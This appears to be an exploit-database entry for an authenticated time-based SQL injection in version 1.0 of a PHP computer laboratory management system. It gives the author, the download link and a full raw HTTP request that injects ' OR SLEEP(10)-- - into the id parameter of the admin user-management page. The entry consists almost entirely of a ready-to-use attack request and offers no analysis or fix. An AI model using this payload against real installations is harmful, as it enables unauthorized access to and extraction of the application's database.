Share
## https://sploitus.com/exploit?id=PACKETSTORM:180063
# Exploit Title: Computer Laboratory Management - SQL Injection (Authenticated)  
# Date: 11/08/2024  
# Exploit Author: Mert Kuvvet  
# Vendor Homepage:  
https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lms.zip  
# Version: 1.0  
# Tested on: Windows 11 / XAMPP  
  
  
############## Authenticated SQL Injection ##############  
  
  
  
  
GET /php-lms/admin/?page=user/manage_user&id=7%27%20OR%20SLEEP(10)--%20-  
HTTP/1.1  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br, zstd  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: keep-alive  
Cookie: PHPSESSID=9daen5894p8jjjehipoq0pi7s6  
Host: localhost  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36